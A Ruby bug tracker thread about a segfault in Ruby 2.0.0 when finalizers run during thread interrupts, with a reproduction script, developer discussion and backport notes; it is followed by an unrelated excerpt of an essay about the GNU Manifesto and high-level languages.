/usr/lib64/libruby20.so.2.0(+0x1ae8b9) [0x7fc0ee2c68b9] insns.def:1002 /usr/lib64/libruby20.so.2.0(+0x1bdcd9) [0x7fc0ee2d5cd9] vm.c:1201 /usr/lib64/libruby20.so.2.0(rb_iseq_eval_main+0x34) [0x7fc0ee2d6b22] vm.c:1449 /usr/lib64/libruby20.so.2.0(+0x6c4dc) [0x7fc0ee1844dc] eval.c:250 /usr/lib64/libruby20.so.2.0(ruby_exec_node+0x24) [0x7fc0ee1845f5] eval.c:315 /usr/lib64/libruby20.so.2.0(ruby_run_node+0x3e) [0x7fc0ee1845c8] eval.c:307 ruby() [0x400ac9] /lib64/libc.so.6(__libc_start_main+0xf5) [0x7fc0edd8c6f5] ruby() [0x400969] And this is the script which can reproduce the issue: #!/usr/bin/ruby require 'thread' require 'sync' def finalizer(queues, i) proc do puts "Finalizing #{i}" queues.synchronize(:EX) do queues.delete(i) end end end queues = {} queues.extend(Sync_m) 10000.times do |i| puts "Starting #{i}" queue = Queue.new queues[i] = queue ObjectSpace.define_finalizer(Object.new, finalizer(queues, i)) queue << nil queue.pop end This was as simple a test case as I could create. In the finalizer, if you just call (({queues.delete()})) without the (({queues.synchronize()})), the issue does not occur. The issue appears new to 2.0.0. I could not duplicate it with 1.9.3p448 =end Files Updated by Glass_saga (Masaki Matsushita) over 8 years ago - Category set to core - Status changed from Open to Assigned - Target version set to 2.1.0 - Backport changed from 1.9.3: UNKNOWN, 2.0.0: UNKNOWN to 1.9.3: DONTNEED, 2.0.0: REQUIRED I wrote minimal code. raise_proc = proc do raise end 10000.times do ObjectSpace.define_finalizer(Object.new, raise_proc) Thread.handle_interrupt(RuntimeError => :immediate) do # SEGV is caused in :on_blocking and :never too. break end end Updated by tarui (Masaya Tarui) over 8 years ago - Status changed from Assigned to Open - Priority changed from Normal to 5 I think that this is serious. i checked what happen at error case. - By break, throwobj is set to th->errinfo in throw RubyVM command. - In rb_thread_s_handle_interrupt, trap(TAG) throwobj, and call finalizer via RUBY_VM_CHECK_INTS(th) before JUMP_TAG. - In finalizer, th->errinfo is used by raise. Updated by apoc (Matthias Hecker) over 8 years ago I'm writing because I think I encountered that bug in the ruby IRC bot rbot: The stacktrace looks very similar, the crash only happens after a few hours. rbot is using Queue (and Mutex to synchronize). I can reproduce the bug with the script provided. Also using 2.0.0p353, the bot works fine in 1.9.3. Updated by nobu (Nobuyoshi Nakada) over 8 years ago - Status changed from Open to Closed - % Done changed from 0 to 100 This issue was solved with changeset r44260. Patrick, thank you for reporting this issue. Your contribution to Ruby is greatly appreciated. May Ruby be with you. vm_trace.c: isolate exceptions - vm_trace.c ( rb_postponed_job_flush): isolate exceptions in postponed jobs and restore outer ones. based on a patch by tarui. [ruby-core:58652] [Bug #9168] Updated by nagachika (Tomoyuki Chikanaga) over 8 years ago - Tracker changed from Bug to Backport - Project changed from Ruby master to Backport200 - Category deleted ( core) - Status changed from Closed to Assigned - Assignee set to nagachika (Tomoyuki Chikanaga) - Target version deleted ( 2.1.0) Updated by nagachika (Tomoyuki Chikanaga) over 8 years ago Because ruby_2_0_0 don't has postponed_job, r44260 cannot be backported to ruby_2_0_0 cleanly. I've made equivalent patch for ruby_2_0_0. nobu, please review it. Thanks in advance. Updated by nobu (Nobuyoshi Nakada) over 8 years ago Why are rb_set_errinfo and direct assignment mixed? Updated by nagachika (Tomoyuki Chikanaga) over 8 years ago Thank you for your reviewing. Why are rb_set_errinfo and direct assignment mixed? Because rb_set_errinfo() raise error when argument is Fixnum and state is TAG_BREAD, TAG_FATAL etc. Updated by nagachika (Tomoyuki Chikanaga) over 8 years ago - Status changed from Assigned to Closed Also available in: Atom PDF
https://bugs.ruby-lang.org/issues/9168
CC-MAIN-2022-27
refinedweb
1,037
54.49
Ready to rock: Same here: Ready to"} 12 minutes and counting... Less than ONE minute!!! What do we think of them? Easy? Tough? Confusing? I think it's going to be a little more tough than I anticipated. None of the rules have anything to do with my original ideas for a quick game. For example, I don't know anything about pathfinding algorithms. 1. Craftsmanship: The game is centered around crafting items out of components. 1. Include dialog in poetic form (rhymed couplets, limerick, haiku) as much as you can 2. Include snow 1. path finding 2. I I didn't think that al_draw_text could draw unicode characters? How does it know which encoding to use? Wouldn't it just interpret it as ascii? UTF8. All of Allegro's strings are UTF8 - so as long as your text editor is set to UTF8 it will work. Other than that you need to be careful though - functions like strlen() or strcat() will work as all they care about are 0-bytes in the string, and UTF8 is compatible with ASCII there. Other things will not work in general, so there is a point where you will want the al_ustr_* functions instead. But for simple things you don't have to Holy crap I've been coding for about 14 hours straight. Game's coming along pretty smoothly . How you guys holding up? Everybody goes Japanese. I think I'll go Russian. That's weird. All I see is my wife's webcam website. I didn't put that webcam. Really! TINS Update: God, I suck. O_O I've gotten so rusty with game programming and my health problems keep getting in the way. I've only put ~1.5 hours in so far and I need to take a break. Mid-speedhack crisis is starting to kick in for a few people. It's natural around this time. Things might seem overwhelming at this point, all the things you have planned and no time to do all of them. Don't give up yet! It's a matter of properly scaling your plans. Miran Amon succeeded in creating a second-place entry with just one day of coding. Elias is still planning to submit with just a few hours of spare time, and I'm hoping he succeeds. Adjust your targets. Anybody can write hangman in 2 hours. With the proper dressing up, you can make hangman fit the rules as well: Hangman is crafting a scaffold. The word you look for is the last word of a poem. It's a poem about finding your path in life. The win / game over message is in russian. There is a snow particle effect in the background. Ok, so it might not be a winning entry. Submitting a complete game is its own reward. Been following the logs, I'm impressed to see how you guys can do so much in such a little time. I got a late start together with lack of skill and lack of ideas. Gave up after I couldn't get my collision detection right. Good luck to everyone. I never had time to participate, though I was probably the first to sign up. But here's my rhyme dictionary for anyone, who hasn't started with the dialog yet. Haa yes, that was a good night ! Down @ 2h22 of the morning, but it works ! 3H50 before the end, and still a lot to do !! Keep going guys ! Edit: Deadline is soon, I submitted !! Donc't wait and give what you have ! I did a point'n'click with only one puzzle, but it has all rules. Did I win yet? Mark, where can I find allegro_flares.h ? AllegroFlare is my framework/library. You'll need to compile the project from source - I made a 0.8.7.tins release here). The TINS game + allegro_flare will only work with Allegro 5.2.0. If you plan on building, please let me know what problems you run into. I'm wanting to make building AllegroFlare as seamless as possible before 1.0. When I put up my game thread, I plan to have builds. I ran into problems. I stopped for now. Mainly: Added #include <stdio.h> #include <string.h> to include/allegro_flare/attributes.h Quoted al_set_new_bitmap_depth in ElementID *ElementIDManager::get_element_by_id(std::string id) line 47 (What does it do here ?) added #include <iostream> to include/allegro_flare/clipboard.h Edit: and obligatory changed the makefile includes, path error else: LIBS_ROOT=. ALLEGRO_DIR=$(LIBS_ROOT)/allegro5 ALLEGRO_LIB_DIR=$(ALLEGRO_DIR)/build/lib ALLEGRO_FLARE_DIR=./include ALLEGRO_FLARE_LIB_NAME=allegro_flare-$(ALLEGRO_FLARE_VERSION_STR) INCLUDE_FLAGS=-I$(ALLEGRO_DIR)/include -I$(ALLEGRO_FLARE_DIR) Else allegro-flare itself would not compile. See you tomorrow ! Quoted al_set_new_bitmap_depth in ElementID *ElementIDManager::get_element_by_id(std::string id) line 47 (What does it do here ?) *Smacks self on head* Can't believe I left that in there. Also, that means you're not using Allegro 5.2.0. In order for the game to work it needs features in that version (namely the al_set_new_bitmap_depth()) added #include <iostream> to include/allegro_flare/clipboard.h Oh good catch. Actually, that should probably go in source/clipboard_generic.cpp. I got tied up with personal problems. No entry for me this year. :/ I got tied up with personal problems. No entry for me this year. :/ :/ I ended up with a bunch of health issues. I put maybe four hours in. Was playing around with a GTA-style game but more puzzle, with trying to drive through obstacles / parking lots without getting in an accident. I haven't given up on it, but I've come to realize how little "free time" I really have even when I'm truly interested in a project.
https://www.allegro.cc/forums/print-thread/616257
CC-MAIN-2018-05
refinedweb
950
78.55
<!-- Add the rest of your HTML here --> This article explains how to use my self-written CShellContextMenu class which makes it possible to use the shell contextmenu in your own application (the one that shows if you right-click on an object in the Windows Explorer). CShellContextMenu I have a lot of projects in which i work with files/folders. So I wanted to use the common shell contextmenu for those. Microsoft put a wonderful example on how to achieve this in their Platform SDK, called EnumDesk. But since not all people understand Shell interfaces and the code should be reusable, I wrapped things up in a C++ class. I also did some google-searching to get some good ways of implementing this. The class hides all the interface-related stuff; you can either use normal file system paths (f. ex. c:\windows) or PIDLs to obtain the shell contextmenu. So here it this, the CShellContextMenu class which makes it easy as hell to use the shell contextmenu. Platform SDK EnumDesk PIDLs CShellContextMenu scm; // instantiate class object scm.SetObjects (TEXT ("<A href="">c:\\</A>")); // we whant shellcontext menu for drive c:\ scm.ShowContextMenu (this, point); // point is a CPoint objects which indicates where the contextmenu should // be shown this refers to a MFC-window class (showcontextmenu needs that // to set the owner window) There's just one other importing thing you have to do. In your InitInstance () function of your CWinApp derived class insert the following lines of code, that's neccessary otherwise not all shell contextmenu items would be shown. InitInstance () CWinApp // Initialize OLE 2.0 libraries if (!AfxOleInit ()) { AfxMessageBox (TEXT ("Unable to load OLE 2.0 libraries!")); return (FALSE); } #include #include <afxole.h> // for OLE That's all you need to pop-up the shell contextmenu for drive C. CShellContextMenu also supports multiple files/folders. Just pass an CStringArray to CShellContextMenu::SetObjects () and you'll get a contextmenu which refers to all the items specified in that array. That corresponds to selecting multiple objects in Windows Explorer and than right-click on the selection. Keep in mind that if you pass multiple files/folder/shell objects, they have to be all in the same folder. This is no limitation of CShellContextMenu, rather then how the IContextMenu interface is implemented in the Windows Shell. CShellContextMenu also works with PIDLs. If you don't know what PIDLs are then it won't matter, cause CShellContextMenu handles the stuff for you. I would also suggest that you have a look at SetObjects (...) and the other functions to get a better grab to shell interfaces. The source code is also heavily commented, so with MSDN at hand there shouldn't be any problems. CStringArray CShellContextMenu::SetObjects () IContextMenu SetObjects (...) Let's have an inside look in CShellContextMenu and see what it really does under the hood to obtain that handy shell contextmenu. First take a look at those SetObjects (...) methods. void SetObjects (CString strObject); // one file system path (file/folder) void SetObjects (CStringArray &strArray); // array of multiple file system paths (files/folders) void SetObjects (LPITEMIDLIST pidl); // full qualified PIDL of shell object void SetObjects (IShellFolder * psfFolder, LPITEMIDLIST pidlItem); // relative PIDL and its parent IShellFolder interface void SetObjects (IShellFolder * psfFolder, LPITEMIDLIST * pidlArray, int nItemCount); // array of multiple relative PIDLs and their parent IShellFolder interface With the SetObjects (...) you tell CShellContextMenu for which objects (file/folder/shell object) you wish to have the contextmenu. For people who don't know how to handle PIDLs or if your program just works with usual file system paths I implemented two overriden methods of SetObjects (...) that accept a CString or a CStringArray as argument and CShellContextMenu converts the given file system path(s) into PIDLs and retrieves its IShellFolder interface. That's neccessary because the IContextMenu interface is only accessable via the IShellFolder interface which only takes PIDLs as an argument. Now we take some in-depths look at ShowContextMenu which actually does the work. CString IShellFolder ShowContextMenu UINT CShellContextMenu::ShowContextMenu(CWnd *pWnd, CPoint pt) { int iMenuType = 0; // to know which version of IContextMenu is supported LPCONTEXTMENU pContextMenu; // common pointer to IContextMenu and higher version interface if (!GetContextMenu ((void**) &pContextMenu, iMenuType)) return; // something went wrong if (!m_Menu) { delete m_Menu; m_Menu = NULL; m_Menu = new CMenu; m_Menu->CreatePopupMenu (); } // lets fill the our popupmenu pContextMenu->QueryContextMenu (m_Menu->m_hMenu, m_Menu->GetMenuItemCount(),0, MIN_ID, MAX_ID, CMF_EXPLORE); // subclass window to handle menurelated messages in CShellContextMenu WNDPROC OldWndProc; if (iMenuType > 1) // only version 2 and 3 supports menu messages { OldWndProc = (WNDPROC) SetWindowLong (pWnd->m_hWnd, GWL_WNDPROC, (DWORD) HookWndProc); if (iMenuType == 2) g_IContext2 = (LPCONTEXTMENU2) pContextMenu; else // version 3 g_IContext3 = (LPCONTEXTMENU3) pContextMenu; } else OldWndProc = NULL; UINT idCommand = Menu.TrackPopupMenu (TPM_RETURNCMD | TPM_LEFTALIGN, pt.x, pt.y, pWnd); if (OldWndProc) // unsubclass SetWindowLong (pWnd->m_hWnd, GWL_WNDPROC, (DWORD) OldWndProc); // see if returned idCommand belongs to shell menu entries if (idCommand >= MIN_ID && idCommand <= MAX_ID) { //executes related command InvokeCommand (pContextMenu, idCommand - MIN_ID); idCommand = 0; } pContextMenu->Release(); g_IContext2 = NULL; g_IContext3 = NULL; return (idCommand); } As you can see ShowContextMenu takes a pointer to a CWnd object and a CPoint object as arguments. The CWnd pointer is needed for later subclassing and CPoint is used to determine at which position the contextmenu should be shown. Note that these are screen coordinates. So, if you have client coordinates convert them via ScreenToClient (...) before passing them to ShowContextMenu. So, what is ShowContextMenu doing? First it calls the GetContextMenu (...) to retrieve the IContextMenu interface (which is then stored in pContextMenu) associated with the objects passed in SetObjects (...). The GetContextMenu is explained afterwards. What we now have to do, is to determine which version of IContextMenu we have. That's neccessary because if we have a IContextMenu higher than version 1, we need to handle the WM_DRAWITEM, WM_MEASUREITEM and WM_INITMENUPOPUP messages. These message are send to the window pointed to by pWnd which is passed in ShowContextMenu's argument list. That's the point where window subclassing comes in handy. All we have to do, is to redirect the window's default window procedure (the function which handles all the messages belonging to a window). With SetWindowLong (...) we set the new window procedure to HookWndProc (...) which is a static member function of CShellContextMenu. CWnd CPoint ScreenToClient (...) GetContextMenu (...) pContextMenu GetContextMenu pWnd SetWindowLong (...) HookWndProc (...) Let's again take a look at the code. After we have a pointer to the IContextMenu interface we create a popup menu with CMenu's CreatePopuMenu () method. The next thing is, we let our popup menu fill with IContextMenu's QueryContextMenu (...) method. This method has four parameters. The first is the handle to the popupmenu which should be filled with the shell menu items. The second is the menu position where it starts. This could be useful because before you let the menu be filled you can insert additional menu items which are specific to your program. Therefore the 3rd and 4th parameters. They specify the lowest and highest command ID that QueryContextMenu (...) should use to fill the menu. That means, that command IDs which are below or above that range, are for you own additional menu items. CShellContextMenu has support for adding custom menus. Just call the GetMenu () method to retrieve a CMenu pointer to the popupmenu. With this you can customize the menu as you like. After that, go on as usual and call ShowContextMenu (...). The 5th parameter uses the flag CMF_EXPLORE to indicate that we want the same items that Window Explorer shows in its contextmenu. Then we subclass pWnd and redirect all messages to HookWndProc (...), but only if the IContextMenu is Version 2 or 3. With CMenu's TrackPopupMenu (...) we show the contextmenu, and store the command ID of the selected menu item in idCommand. Then we test idCommand if its between MIN_ID and MAX_ID, if so it means that a shell menu item was clicked and not one we manually inserted (btw. those constants are defined in ShellContextMenu.cpp, change them to your needs if you wish to). If its a shell menu item we call CShellContextMenu::InvokeCommand (...) which executes the appriorate command that belongs to a shell menu item and release the IContextMenu interface with pContextMenu->Release () CMenu CreatePopuMenu () QueryContextMenu (...) GetMenu () ShowContextMenu (...) CMF_EXPLORE TrackPopupMenu (...) CShellContextMenu::InvokeCommand (...) pContextMenu->Release () Here's GetContextMenu which retrieves the highest version of IContextMenu available to the given objects. m_psfFolder is an IShellFolder interface, via its GetUIObjectsOf method we get version 1 of its IContextMenu interface. nItems is the number of object that were passed in SetObjects (...) and m_pidlArray is an array of PIDLs that are relative to m_psfFolder (IShellFolder interface). Those PIDLs were also passed in SetObjects (...) or if you passed a file system paths CShellContextMenu has automatically retrieved the corresponding PIDLs and the IShellFolder interface. If we have a valid IContextMenu interface we try to get version 3, if that fails we test for version 2 and if that too fails we stay with version 1. And that's all. m_psfFolder GetUIObjectsOf nItems m_pidlArray BOOL CShellContextMenu::GetContextMenu (void ** ppContextMenu,int & iMenuType) { *ppContextMenu = NULL; LPCONTEXTMENU icm1 = NULL; // first we retrieve the normal IContextMenu // interface (every object should have it) m_psfFolder->GetUIObjectOf (NULL, nItems, (LPCITEMIDLIST *) m_pidlArray, IID_IContextMenu, NULL, (void**) &icm1); if (icm1) { // since we got an IContextMenu interface we can // now obtain the higher version interfaces via that if (icm1->QueryInterface(IID_IContextMenu3, ppContextMenu) == NOERROR) iMenuType = 3; else if (icm1->QueryInterface (IID_IContextMenu2, ppContextMenu) == NOERROR) iMenuType = 2; if (*ppContextMenu) icm1->Release(); // we can now release version 1 interface, // cause we got a higher one else { iMenuType = 1; *ppContextMenu = icm1; // since no higher versions were found } // redirect ppContextMenu to version 1 interface } else return (FALSE); // something went wrong return (TRUE); // success } That's the alternative window procedure that is only used while the contextmenu is being showed. HookWndProc checks for menu reletad messages and calls the IContextMenu's HandleMenuMsg. g_IContext2 and g_IContext3 are global pointers, they are pointing to IContextMenu2 and IContextMenu3 interfaces of the contextmenu that is currently being showed. It's neccessary to have a global variable because HookWndProc is a static member function and static member functions have no this pointer, therefore it cannot access its class member variables and functions. The HookWndProc must be static because a non-static member function has always an additional this pointer, and therefore its argument list wouldn't match that of a window procedure. At the end of HookWndProc we call the original WndProc to avoid undefined behaviour of the associated window. The original WndProc is retrieved via the GetProp () API function. Refer to the MSDN for further informations on this API function. HookWndProc HandleMenuMsg g_IContext2 g_IContext3 IContextMenu2 IContextMenu3 this WndProc GetProp () LRESULT CALLBACK CShellContextMenu::HookWndProc (HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { switch (message) { case WM_MENUCHAR: // only supported by IContextMenu3 if (g_IContext3) { LRESULT lResult = 0; g_IContext3->HandleMenuMsg2 (message, wParam, lParam, &lResult); return (lResult); } break; case WM_DRAWITEM: case WM_MEASUREITEM: if (wParam) break; // if wParam != 0 then the message is not menu-related case WM_INITMENUPOPUP: if (g_IContext2) g_IContext2->HandleMenuMsg (message, wParam, lParam); else // version 3 g_IContext3->HandleMenuMsg (message, wParam, lParam); return (message == WM_INITMENUPOPUP ? 0 : TRUE); // inform caller that // we handled WM_INITPOPUPMENU by ourself break; default: break; } // call original WndProc of window to prevent undefined bevhaviour // of window return ::CallWindowProc ((WNDPROC) GetProp ( hWnd, TEXT ("OldWndProc")), hWnd, message, wParam, lParam); } This little function is also very important. Without it the shell context menu would also show correctly with all the expected menu items, but it would do just nothing if you'd click on an item. So, all this function does is fill an CMINVOKECOMMANDINFO, set its lpVerb member to the idCommand (command ID of the clicked menu item) and calls the IContextMenu's InvokeCommand method, which finally executes the command that belongs to the menu item that was clicked. CMINVOKECOMMANDINFO lpVerb InvokeCommand void CShellContextMenu::InvokeCommand (LPCONTEXTMENU pContextMenu, UINT idCommand) { CMINVOKECOMMANDINFO cmi = {0}; cmi.cbSize = sizeof (CMINVOKECOMMANDINFO); cmi.lpVerb = (LPSTR) MAKEINTRESOURCE (idCommand); cmi.nShow = SW_SHOWNORMAL; pContextMenu->InvokeCommand (&cmi); } So, that's the whole thing behind the shell contextmenu. Wasn't that hard was it? Shell interfaces are not that difficult like they seem to be on the first look. One problem with them is that they are not well documented in the MSDN. So with a little work and some google-searching everything's possible. Before I began working with that shell context menu I didn't know much about the Shell. I did use a lot of shell functions like SHGetFileInfo and such stuff, but no real shell interfaces, PIDLs and such. Now I'm able to produce a full Windows Explorer alternative with the shell interfaces. That's not a very hard thing to do. SHGetFileInfo I hope the article is good to understand, because English is not my native language. On the other hand, it's my first development related article ever. So hey, I think it's good enough for that. I hope the example project covers CShellContextMenu fairly well, so you'll know how to use it. It also demonstrates how to add custom app-specific menu item< to the contextmenu before it is shown and shows how to imitate the right-pane listview of Windows Explorer (in a simple way). The active project configuration is set to ANSI compiling, but everything also works in UNICODE mode, which is also included as a project configuration. I'm also considering providing CListCtrl and CTreeCtrl derived classes which imitate those in Windows Explorer. But this could still be a long way ahead, because while writing this article I noticed that it's really an exhausting task, harder than actually programming . There is already 2 or 3 article about that on codeproject.com, but I've noticed that those examples/classes are totally overblown, and therefore the source codes of those are almost impossible to follow and understand. CListCtrl CTreeCtrl SHBindToParent SHBindToParentEx April 10th, 2003 This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below. A list of licenses authors might use can be found here SimpleShlExt.h(32) : error C2787: 'IContextMenu' : no GUID has been associated with this object General News Suggestion Question Bug Answer Joke Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
http://www.codeproject.com/Articles/4025/Use-Shell-ContextMenu-in-your-applications?msg=1259462
CC-MAIN-2015-22
refinedweb
2,373
54.02
Build a Chat App with Firebase and React Native | Jscrambler Blog In this tutorial, you are going to build a chat application using React Native, Expo, and Firebase as the backend service. The application will contain a simple login system using an email address for each specific user. The user will be allowed to upload a profile picture. The chat application will be more of a global chat room but works in real time. You can find the complete npm run ios # for Android npm run android Next, install a dependency called react-native-gifted-chat that provides customizable UI for a chat application. For navigating between different screens, we are going to use react-navigation and lastly, to connect with the Firebase project, we need Firebase SDK. npm install --save react-native-gifted-chat [email protected] firebase uuid In order to build the application, we are going to need: - A user authentication service - A service to store the user's email - A service to store the user's avatar image - A service to store messages All of these services are going to be leveraged from Firebase. Setting up Firebase Firebase is a cloud service by Google that provides an SDK with services like email and social media authentication, real-time database, machine learning kit, APIs, and so on. In the application, we are going to use email authentication and cloud storage. To set up a Firebase free tier project, visit the Firebase Console and create a new project, enter a name and then click the button Create Project button. Develop section, then click on the Sign-in method. Enable authentication using Email/Password and then hit Save button. Setup Firebase Database The next step is to enable the Database rules. Visit the second tab called Database from the sidebar menu and then select Realtime Database. Then select the second option Rules and modify them like below. That's it for the setup part. In the next section, let us start building the application. Chat Screen The react-native-gifted-chat component allows us to display chat messages that are going to be sent by different users. To get started, create a new directory called components. This is where we are going to store all of the components whether presentational or class. Inside this directory, create a new file, Chat.js with the following code snippet. import React from 'react'; import { GiftedChat } from 'react-native-gifted-chat'; export default class Chat extends React.Component { render() { return <GiftedChat />; } } Now open the App.js file and add logic to create a navigational component using the react-navigation module. This file will contain a stack navigator, and later we will add more screens into the navigator. For now, there is only a chat screen. import { createStackNavigator } from 'react-navigation'; import Chat from './components/Chat'; export default createStackNavigator({ Chat: { screen: Chat } }); Now if you run the simulator device, you will notice that there is a bare minimum chat screen that has a plain white header, background and, at the bottom of the screen, an input area where the user can enter the message. When typing something, a Send button automatically appears. However, this Send button does not have any functionality right now. Connecting with Firebase SDK Since we have already installed Firebase SDK dependency in our project, now let us add the other configuration required in order to connect the React Native app with Firebase. Create a folder called config and inside it a new file, firebaseSDK.js. In this file, add the following keys. import firebase from 'firebase'; class FirebaseSDK { constructor() { if (!firebase.apps.length) { //avoid re-initializing firebase.initializeApp({ apiKey: '<your-api-key>', authDomain: '<your-auth-domain>', databaseURL: 'https://<your-db-url>.firebaseio.com', projectId: '<your-project-id>', storageBucket: '<your-storage-bucket>.appspot.com', messagingSenderId: '<your-sender-id>' }); } } login = async (user, successcallback, failedcallback) => { await firebase .auth() .signInWithEmailAndPassword(user.email, user.password) .then(successcallback, failedcallback); }; } const firebaseSDK = new FirebaseSDK(); export default firebaseSDK; First, to obtain and add the required keys in the above file you will have to visit the Firebase console. Click the gear icon next to Project Overview in the left-hand side menu bar and lastly go to Project settings section. The login function is the business logic to authenticate users who have registered with email and password. It will have two callback functions, one for the case where user credentials are valid, and then another in case of invalid or unregistered user credentials. Also, in the Authentication screen at your Firebase console, add a test user since we are going to add a login component before the sign-up one. Create a new component file Login.js inside the components directory with the code you can find here. Import the necessary components from React Native core and firebaseSDK object. Also, there is going to be an initial state for testing purposes which will contain the same email ID and password that we initialized in the Firebase console in the previous section. In Login.js, also notice that the two methods loginSuccess and loginFailed are the callback arguments that we discussed in the previous section. One of them will be executed. In the above component, we are calling them along by passing user credentials on a Login button with the method onPressLogin. When running the simulator, you will get the following result. Also note that, if the user is not yet registered in the app, they can directly navigate to the signup screen from the login screen by clicking the Login button as of now, they will be directed to the chat screen. On entering the wrong password or email ID, it will throw an alert box stating the error message. Creating the Signup Screen In this section, you are going to add the functionality for any user to sign up to our chat application, as long as they provide credentials that we store in Firebase. Apart from email ID and password, we are also going to let users fill up their name and upload an image for an avatar. To create a new account with email and password along with the user's name and profile image, we add the following to the config/firebaseSDK.js file. createAccount = async user => { firebase .auth() .createUserWithEmailAndPassword(user.email, user.password) .then( function() { console.log( 'created user successfully. User email:' + user.email + ' name:' + user.name ); var userf = firebase.auth().currentUser; userf.updateProfile({ displayName: user.name }).then( function() { console.log('Updated displayName successfully. name:' + user.name); alert( 'User ' + user.name + ' was created successfully. Please login.' ); }, function(error) { console.warn('Error update displayName.'); } ); }, function(error) { console.error('got error:' + typeof error + ' string:' + error.message); alert('Create account failed. Error: ' + error.message); } ); }; uploadImage = async uri => { console.log('got image to upload. uri:' + uri); try { const response = await fetch(uri); const blob = await response.blob(); const ref = firebase .storage() .ref('avatar') .child(uuid.v4()); const task = ref.put(blob); return new Promise((resolve, reject) => { task.on( 'state_changed', () => { }, reject () => resolve(task.snapshot.downloadURL) ); }); } catch (err) { console.log('uploadImage try/catch error: ' + err.message); } }; updateAvatar = url => { var userf = firebase.auth().currentUser; if (userf != null) { userf.updateProfile({ avatar: url }).then( function() { console.log('Updated avatar successfully. url:' + url); alert('Avatar image is saved successfully.'); }, function(error) { console.warn('Error update avatar.'); alert('Error update avatar. Error:' + error.message); } ); } else { console.log("can't update avatar, user is not login."); alert('Unable to update avatar. You must login first.'); } }; From the above file, you can notice that uploadImage is the function that allows the user to upload the profile picture. The createAccount function communicates with the Firebase SDK to register the user. The next step is to create the Signup component. Create a new file components/Signup.js and add this code. In this component, we are going to ask the device for permissions to allow access to the device's file system and to upload an image. The Expo API has a simple way to add the logic for asking them through Permissions. The ImagePicker component helps the app to select an image only if the permission to access the file system was granted. It also has advanced methods such as ImageEditor.cropImage that you leverage to allow the user to crop their profile picture. There is an initial component state that keeps track of all the user information. When the user enters all required input field, the state object in the component will also get an update. To make this work, modify the stack navigator inside the App.js file. import { createStackNavigator } from 'react-navigation'; import Login from './components/Login'; import Signup from './components/Signup'; import Chat from './components/Chat'; export default createStackNavigator({ Login: { screen: Login }, Signup: { screen: Signup }, Chat: { screen: Chat } }); In the demo below, as a user you can upload the user avatar while signing up, or register a new user account and then login with that account. Adding Chat Functionality As the authentication in our chat application is now working, we can move ahead and add the chat functionality itself. This component is going to need the user information from Firebase in order to create a chat message and send it. Using react-navigation in our project is going to be very useful. We will be using props coming from the login screen to retrieve the user information. There is a component state we have to declare that will contain a messages array. Modify the components/Chat.js file accordingly. import React from 'react'; import { GiftedChat } from 'react-native-gifted-chat'; // 0.3.0 import firebaseSDK from '../config/firebaseSDK'; export default class Chat extends React.Component { static navigationOptions = ({ navigation }) => ({ title: (navigation.state.params || {}).name || 'Chat!' }); state = { messages: [] }; get user() { return { name: this.props.navigation.state.params.name, email: this.props.navigation.state.params.email, avatar: this.props.navigation.state.params.avatar, id: firebaseSDK.uid, _id: firebaseSDK.uid }; } render() { return ( <GiftedChat messages={this.state.messages} onSend={firebaseSDK.send} user={this.user} /> ); } componentDidMount() { firebaseSDK.refOn(message => this.setState(previousState => ({ messages: GiftedChat.append(previousState.messages, message) })) ); } componentWillUnmount() { firebaseSDK.refOff(); } } Now, let us run the application again, either with npm run ios or npm run android. We are running two interfaces of the application in order to demonstrate the chat functionality. The one you will see below is on iOS simulator with a user named Alice. applications with sensitive logic, be sure to protect them against code theft and reverse-engineering with Jscrambler.
http://brianyang.com/build-a-chat-app-with-firebase-and-react-native-jscrambler-blog/
CC-MAIN-2019-39
refinedweb
1,733
51.04
This site uses strictly necessary cookies. More Information So i am trying to directly cast a instantiated object as my custom component ClickableTile. TileType tt = tileTypes[tiles[x, y]]; var tile = Instantiate(tt.tileVisualPrefab, new Vector3(x, y, 0), Quaternion.identity) as ClickableTile; Debug.Log(tile); This returns null. ClickableTile.cs looks like this and are attached to the prefab: public class ClickableTile : MonoBehaviour { public int tileX; public int tileY; public TileMap map; void OnMouseUp() { Debug.Log("Click!"); map.MoveSelectedUnitTo(tileX, tileY); } } Why isnt this working? I thought that we could cast to any component on object? This works: TileType tt = tileTypes[tiles[x, y]]; GameObject tile = (GameObject)Instantiate(tt.tileVisualPrefab, new Vector3(x, y, 0), Quaternion.identity); ClickableTile ct = tile.GetComponent<ClickableTile>(); Something i am missing? Answer by jgodfrey · May 21, 2016 at 03:24 PM I assume your "ClickableTile" script has just been added (as a component) to a standard GameObject that you've turned into a prefab, right? if that's the case, the object you're instantiating isn't a "ClickableTile", it's a GameObject that has a ClickableTile component attached to it. To get access to the ClickableTile script, you need to instantiate the prefab as a GameObject, and then get a reference to the ClickableTile component. So, something like this: GameObject tile = (GameObject)Instantiate(tt.tileVisualPrefab, new Vector3(x, y, 0), Quaternion.identity); var ct = tile.GetComponent<ClickableTile>(); Yes that is the case. I was assuming i could just cast it to a ClickableTile, i am sure i saw something like this in a tutorial i watched earlier. Well, thanks, i guess that is cleared. Start coroutines when the class is not a MonoBehaviour 1 Answer My components are disappears 1 Answer Game Manager can't decide what the instance of the object is despite just making an instance of it 1 Answer Why does my script and collider2D automatically deactivate after reloading the scene? 0 Answers Dynamic casting? 1 Answer EnterpriseSocial Q&A
https://answers.unity.com/questions/1190274/why-isnt-this-instantiation-cast-working.html
CC-MAIN-2021-25
refinedweb
330
51.14
In which the author attempts to write foreign-language bindings for some commonly available Unix functions In which the author attempts to write foreign-language bindings for some commonly available Unix functions. That is an excerpt from the GNU Manifesto. I assume that it was written around 1985 - I came to the free software party late, having found it by accident while trying to exit from Emacs 18, but that's what the copyright notice on the file says. One Linux-based GNU system later, it's interesting to look at that and see where we are now as against where we were back then. Longer file names? Check. Version numbers? Not supported in any widespread fashion, but CVS is actually preferable for many purposes. Crashproof fs? Journalling filesystems RSN, but even with ext2 I can count on the fingers of one foot the number of times I've actually lost work due to fs corruption. File name completion? Yup. Terminal-independent? Certainly. Lisp? What's that? Fair question. There are a plethora of high-level languages available in the free software world; Perl and Python both have huge followings, Tcl is still widely used, and Java is inexpensive and widely available (even if the precise status of Java<sup>tm</sup>'s freeness is too complex for me to care enough to know about). Lots of other interesting languages and implementations have Linux-based implementations and active developer communities too - Ruby was featured here on Advogato recently, Caml is pretty popular with the people who know about it, and by the simple act of listing these ones that I can remember I'm opening myself up to vast numbers of responses from people annoyed that I've forgotten their 